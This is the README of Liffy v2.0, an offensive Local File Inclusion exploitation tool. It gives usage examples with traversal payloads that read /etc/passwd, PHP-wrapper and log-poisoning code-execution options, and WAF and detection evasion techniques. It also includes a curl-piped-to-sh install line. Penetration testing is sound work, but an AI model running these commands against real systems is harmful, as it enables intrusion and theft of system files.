A powerful Python tool for Local File Inclusion (LFI) exploitation with advanced features including WAF bypass, encoding techniques, and comprehensive vulnerability detection.
Liffy v2.0 is the significantly enhanced version of liffy which was originally created by rotlogix/liffy. This version includes modern features like Rich terminal output, YAML configuration, enhanced threading, and multiple advanced exploitation techniques.
Lot of new changes were vibe coded using claude.
- data:// - Code execution via data wrapper
- expect:// - Code execution via expect wrapper
- input:// - Code execution via input wrapper
- filter:// - Arbitrary file reads via filter wrapper
- /proc/self/environ - Code execution in CGI mode
- Apache access.log poisoning - Log file exploitation
- Linux auth.log SSH poisoning - SSH log exploitation
- Null Byte Poisoning - Legacy PHP null byte attacks
- ZIP wrapper exploitation - ZIP file inclusion attacks
- WAF Evasion - Multiple bypass techniques for common WAFs
- Advanced Encoding - Double URL encoding, Unicode, case variations
- POST Request Support - Full POST method support with custom data
- Custom Headers - Configurable HTTP headers
- User-Agent Rotation - Randomized user agents to avoid detection
- Rate Limiting - Configurable request throttling
- Multi-threading - Enhanced thread pool management
- Detection Mode - Vulnerability scanning without exploitation
- Rich Terminal Output - Beautiful colored output with progress bars
- YAML Configuration - Persistent settings management
- Enhanced Vulnerability Detection - Advanced response analysis with confidence scoring
- Thread Pool Management - Optimized performance with adaptive threading
- Configuration Management - YAML-based settings with CLI overrides
- Comprehensive Logging - Detailed execution reports and progress tracking
Make sure you are using Python 3. Liffy doesn't support Python 2.
# Install uv if you haven't already
curl -LsSf https://astral.sh/uv/install.sh | sh
# Clone the repository
git clone https://github.com/mzfr/liffy
cd liffy
# Create virtual environment with uv
uv venv
# Activate virtual environment
source .venv/bin/activate # On Linux/Mac
# .venv\Scripts\activate # On Windows
# Install dependencies
uv pip install -r requirements.txt
# Run liffy
uv run python3 liffy.py --helppython3 liffy.py <URL> [OPTIONS]usage: liffy.py [-h] [-d] [-i] [-e] [-f] [-p] [-a] [-ns] [-r] [--ssh]
[-l LOCATION] [--cookies COOKIES] [-dt] [-t THREADS]
[--detection] [--null-byte] [--zip] [--encoding]
[--waf-bypass] [--method {GET,POST}] [--post-data POST_DATA]
[--headers HEADERS] [--no-color] [--no-banner] [--config]
[url]
positional arguments:
url URL to test for LFI
Core Techniques:
-d, --data Use data:// technique
-i, --input Use input:// technique
-e, --expect Use expect:// technique
-f, --filter Use filter:// technique
-p, --proc Use /proc/self/environ technique
-a, --access Apache access logs technique
--ssh SSH auth log poisoning
-dt, --directorytraverse Test for Directory Traversal
--null-byte Test for Null Byte Poisoning
--zip Test for ZIP wrapper exploitation
Advanced Options:
--encoding Use advanced encoding/bypass techniques
--waf-bypass Use WAF evasion techniques
--method {GET,POST} HTTP method to use (default: GET)
--post-data POST_DATA POST data (format: key=value&key2=value2)
--headers HEADERS Custom headers (format: Header1:Value1,Header2:Value2)
--detection Only perform LFI detection, no exploitation
General Options:
-ns, --nostager Execute payload directly, do not use stager
-r, --relative Use path traversal sequences for attack
-l, --location LOCATION Path to target file (access log, auth log, etc.)
--cookies COOKIES Session cookies for authentication
-t, --threads THREADS Number of threads to use (default: 5)
--no-color Disable colored output
--no-banner Disable banner display
--config Create default YAML configuration fileCreate a configuration file for persistent settings:
python3 liffy.py --configThis creates liffy_config.yaml with default settings:
# Liffy Configuration File
max_threads: 5
rate_limit_delay: 0.1
disable_colors: false
disable_banner: false
default_method: GET
user_agent_rotation: trueYou can also use environment variables:
LIFFY_THREADS- Number of threadsLIFFY_RATE_LIMIT- Rate limit delayLIFFY_NO_COLOR- Disable colors (true/false)
When --waf-bypass is enabled, liffy automatically applies multiple evasion techniques:
- Comment Injection:
/**/,#,; - Protocol Confusion:
file:///,pHp:// - Encoding Layering: Multiple encoding combinations
- Path Obfuscation:
./,../, null bytes
With --encoding, liffy applies advanced encoding methods:
- Double URL Encoding:
%252e%252e%252f - Unicode Encoding:
\u002e\u002e\u002f - Mixed Case:
..%2F,..%2f - HTML Entity Encoding:
../
# POST with form data
python3 liffy.py "http://target.com/lfi.php" -d --method POST --post-data "file=../../etc/passwd"
# POST with custom headers
python3 liffy.py "http://target.com/lfi.php" -d --method POST --headers "X-Forwarded-For:127.0.0.1,Authorization:Bearer token123"python3 liffy.py "http://example.com/page.php?file=" -dpython3 liffy.py "http://example.com/page.php?file=" -d -i -e -fpython3 liffy.py "http://example.com/page.php?file=" --detection -d -i -epython3 liffy.py "http://example.com/page.php?file=" -d --waf-bypass --encodingpython3 liffy.py "http://example.com/page.php?file=" -d -t 10 --configpython3 liffy.py "http://example.com/upload.php" -d --method POST \
--post-data "action=read&file=../../etc/passwd" \
--headers "User-Agent:Mozilla/5.0,X-Forwarded-For:192.168.1.1"python3 liffy.py "http://example.com/page.php?file=" -apython3 liffy.py "http://example.com/page.php?file=" --sshpython3 liffy.py "http://example.com/page.php?file=" -a -l "/var/log/apache2/access.log"python3 liffy.py "http://example.com/page.php?file=" -d -rpython3 liffy.py "http://example.com/page.php?file=" -dtpython3 liffy.py "http://example.com/page.php?file=" --null-bytepython3 liffy.py "http://example.com/page.php?file=" --zippython3 liffy.py "http://example.com/page.php?file=" \
-d -i -e -f -p -a --ssh -dt --null-byte --zip \
--encoding --waf-bypass --detectionpython3 liffy.py "http://example.com/page.php?file=" -d \
--cookies "PHPSESSID=abc123; auth_token=xyz789"python3 liffy.py "http://example.com/page.php?file=" -d --no-color --no-bannerThe following default locations are used when no custom path is specified:
- SSH auth.log:
/var/log/auth.log - Apache access.log:
/var/log/apache2/access.log - Alternative Apache log:
/var/log/httpd/access_log
We welcome contributions! Here's how you can help:
- New LFI exploitation techniques
- Additional WAF bypass methods
- Enhanced encoding techniques
- Payload optimization
- Detection improvements
- Report issues via GitHub Issues
- Include detailed reproduction steps
- Provide target environment details
- Fork the repository
- Create a feature branch
- Make your changes with tests
- Submit a pull request
Feel free to open an issue for any questions or suggestions!
Liffy's detection mode provides comprehensive vulnerability analysis:
- High Confidence (80-100%): Strong indicators like
/etc/passwdcontent - Medium Confidence (50-79%): Partial file content or suspicious responses
- Low Confidence (20-49%): Potential indicators requiring manual verification
- File Content Analysis: Recognizes Linux, Windows, and PHP file patterns
- Response Analysis: HTTP status codes, content length, timing analysis
- WAF Detection: Identifies common WAF signatures
- Evidence Collection: Captures proof of vulnerability for reporting
[+] VULNERABILITY SUMMARY
==================================================
[1] Vulnerability Found
Payload: ../../etc/passwd
Confidence: 85%
Evidence: Linux /etc/passwd file: root:
Status Code: 200
Content Length: 1547# Use WAF bypass techniques
python3 liffy.py "http://target.com/lfi.php" -d --waf-bypass
# Reduce thread count and increase delays
python3 liffy.py "http://target.com/lfi.php" -d -t 1# Increase delay in config file
max_threads: 2
rate_limit_delay: 1.0For verbose output, you can modify the configuration:
debug_mode: true
verbose_output: trueLiffy is designed for authorized security testing only.
- Only use on systems you own or have explicit permission to test
- Follow responsible disclosure practices
- Respect rate limits and avoid DoS conditions
- Be aware of legal implications in your jurisdiction
The authors are not responsible for misuse of this tool.
- Original liffy by hvqzao
- Initial concept from rotlogix/liffy
- LFI exploitation techniques from various security research
- WAF bypass methods from public security resources
- PHP wrapper exploitation documentation
- Logo design from renderforest
- Terminal styling using Rich library
This project is licensed under the GNU General Public License v3.0 - see the LICENSE file for details.